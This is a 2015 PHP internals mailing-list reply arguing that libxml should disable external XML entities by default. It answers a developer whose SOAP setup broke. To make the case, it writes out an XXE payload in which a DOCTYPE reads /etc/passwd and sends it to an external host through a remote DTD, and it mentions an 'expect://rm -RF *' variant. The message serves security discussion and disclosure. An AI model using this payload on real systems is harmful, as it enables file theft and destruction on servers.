Newsgroups: php.internals
Path: news.php.net
Xref: news.php.net php.internals:87413
Return-Path: <ircmaxell@gmail.com>
Mailing-List: contact internals-help@lists.php.net; run by ezmlm
Delivered-To: mailing list internals@lists.php.net
Received: (qmail 44816 invoked from network); 30 Jul 2015 18:25:52 -0000
Received: from unknown (HELO lists.php.net) (127.0.0.1)
  by localhost with SMTP; 30 Jul 2015 18:25:52 -0000
Authentication-Results: pb1.pair.com header.from=ircmaxell@gmail.com; sender-id=pass
Authentication-Results: pb1.pair.com smtp.mail=ircmaxell@gmail.com; spf=pass; sender-id=pass
Received-SPF: pass (pb1.pair.com: domain gmail.com designates 209.85.215.47 as permitted sender)
X-PHP-List-Original-Sender: ircmaxell@gmail.com
X-Host-Fingerprint: 209.85.215.47 mail-la0-f47.google.com  
Received: from [209.85.215.47] ([209.85.215.47:34330] helo=mail-la0-f47.google.com)
	by pb1.pair.com (ecelerity 2.1.1.9-wez r(12769M)) with ESMTP
	id 9A/41-34806-E2C6AB55 for <internals@lists.php.net>; Thu, 30 Jul 2015 14:25:51 -0400
Received: by lafd3 with SMTP id d3so30259545laf.1
        for <internals@lists.php.net>; Thu, 30 Jul 2015 11:25:47 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20120113;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :cc:content-type;
        bh=qvG7VfkgXUqGjo4tcyN0We41JS+RnC3G/yk2X6We2j8=;
        b=1I2e/NIwTHh37CqDNUHXXj8hK+CC5tzPL7AFfF+BgPrSV35xyLflFLpHLOJM4cN/GG
         7odZNgiq0G7RjSnNFw2nXhc5EXs/UKWKsJLqkiKP9p0KPvkGz+5hljIFNZtgjAnbyRpx
         2Gl1/M00AcxITXDT6G+gbVCyA79udA9Wn6atOFUUY1Xbw39tsAUuZAFteLtKrD/NtLH+
         0N3ixelYGY7/5hughBbOavHvYHmtPP7IlctROdJz9RCdkDQkDN1qV5ybOZE4ntew623P
         nLOYsbGcVKMiIFcTleHmIC4zbETsJy1B2Ol+kOsUJIj5PuKDJrVQGggMUF7rTV+TnJvU
         XnnQ==
MIME-Version: 1.0
X-Received: by 10.112.158.70 with SMTP id ws6mr45728791lbb.28.1438280747329;
 Thu, 30 Jul 2015 11:25:47 -0700 (PDT)
Received: by 10.25.5.215 with HTTP; Thu, 30 Jul 2015 11:25:47 -0700 (PDT)
In-Reply-To: <55BA59A1.9020503@freepanel.net>
References: <CAAyV7nES6A+_68A2eMdxAGw--_R-A7WhhQJ6VyMzi5p7PneBXw@mail.gmail.com>
	<55BA59A1.9020503@freepanel.net>
Date: Thu, 30 Jul 2015 14:25:47 -0400
Message-ID: <CAAyV7nHKseQ1hX0XhN6WDvfJR+A10HX=apcK=hMXTSijQucbMA@mail.gmail.com>
To: Jake <php@freepanel.net>
Cc: "internals@lists.php.net" <internals@lists.php.net>
Content-Type: text/plain; charset=UTF-8
Subject: Re: [PHP-DEV] Disabling External Entities in libxml By Default
From: ircmaxell@gmail.com (Anthony Ferrara)

Jake,



On Thu, Jul 30, 2015 at 1:06 PM, Jake <php@freepanel.net> wrote:
> Hello
>
> Disabling this will (at least for me) cause SOAP related stuff to stop
> working as it was expected to work before!

The problem here is that imagine the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://example.com/evil1.dtd">

and then evil1.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/content?%file;'>">
%all;

The contents of /etc/passwd would be sent as the url prameter to
http://example.com/content.

That works for any file that the server has access to.

And if you have the expect extension installed it could be MUCH worse.
You could use the URL "expect://rm -RF *" and boom goes the dynamite.

So yeah, while I completely get that some things like SOAP require
external entities, they are also *exceedingly* dangerous. And only to
be used with *extremely* trusted endpoints.

> <?php
> $wsdl = "https://www.some.tld/soap.php?wsdl";
>
> $soap = SoapServer($wsdl, array(....));
>
> wsdl:
>
> <?xml version="1.0" encoding="utf-8"?>
> <wsdl:definitions    xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
>                     xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
>                     xmlns:s="http://www.w3.org/2001/XMLSchema"
>
> xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
>                     xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
>                     xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
>                     xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
>                     xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"
>
> targetNamespace="http://www.some.tld/soap/muppet/user/1.0/">
>     <wsdl:types>
>
>         <s:schema
> targetNamespace="http://www.some.tld/soap/muppet/user/1.0/"
>                     xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"
>                     elementFormDefault="qualified">
>
> ...
>
> It fails with
>
> error to read external entity, failed while parsing external entity
> 'http://www.some.tld/muppet.php?wsdl'

I know that you want it to work, but this is actually a great place to
fail, because you're loading a trusted resource over HTTP. Meaning
that an attacker could MITM and inject malicous XML into the response,
and own your server without even needing to own the endpoint.

> ..
>
> I dont know if i get this error correct but to me it looks like PHP on "www
> frontend" refuse to read WSDL/SOAP/XML from "www backend" because of this...
> Petty much of the SOAP idea is gone then..?

I thought SOAP was dead already.

Kidding aside, the vulnerability isn't super-well-known but also can
be extremely dangerous. Not can-be; is. So something to consider.

Anthony